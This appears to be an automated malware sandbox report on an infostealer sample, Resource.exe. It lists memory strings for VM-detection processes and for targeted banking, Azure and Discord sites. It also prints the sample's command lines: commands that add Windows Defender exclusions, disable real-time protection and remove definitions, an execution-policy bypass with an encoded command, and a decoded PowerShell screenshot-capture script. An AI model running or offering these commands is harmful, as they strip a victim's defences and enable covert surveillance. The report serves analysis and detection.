Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035529511.0000020AB37E0000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2034221177.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWobje%SystemRoot%\system32\mswsock.dll
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Resource.exe, 00000001.00000003.2197829260.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2467713655.0000020AB4879000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190023337.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182338087.0000020AB482F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2243637257.0000020AB482F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2205313641.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2212166345.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: getmac.exe, 0000004B.00000002.2205667566.0000018CAA3E2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198373096.0000018CAA3DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000002.2205667566.0000018CAA3C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: getmac.exe, 0000004B.00000002.2205667566.0000018CAA3E2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198373096.0000018CAA3DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicerc
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwarec
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60AC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6E60AC57C

Source: C:\Users\user\Desktop\Resource.exe

Code function: 1_2_00007FF8A8797B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FF8A8797B30

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60C3AF0 GetProcessHeap,

0_2_00007FF6E60C3AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60AC760 SetUnhandledExceptionFilter,	0_2_00007FF6E60AC760
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60AC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6E60AC57C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60BABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6E60BABD8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60ABCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6E60ABCE0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8183058 IsProcessorFeaturePresent,00007FF8BFAB19C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFAB19C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF8A8183058
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D2135 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF8A92D2135
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92D1CBC SetUnhandledExceptionFilter,	1_2_00007FF8A92D1CBC
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A934DA5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF8A934DA5C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7DF4650 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF8B7DF4650
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E1D070 SetUnhandledExceptionFilter,	1_2_00007FF8B7E1D070
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E12FF8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF8B7E12FF8
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E58050 SetUnhandledExceptionFilter,IsProcessorFeaturePresent,	1_2_00007FF8B7E58050
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E52BC0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF8B7E52BC0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B8AFB9A0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF8B8AFB9A0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618624C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	103_2_00007FF618624C10
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61861B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	103_2_00007FF61861B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61861A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	103_2_00007FF61861A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61861B6D8 SetUnhandledExceptionFilter,	103_2_00007FF61861B6D8

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
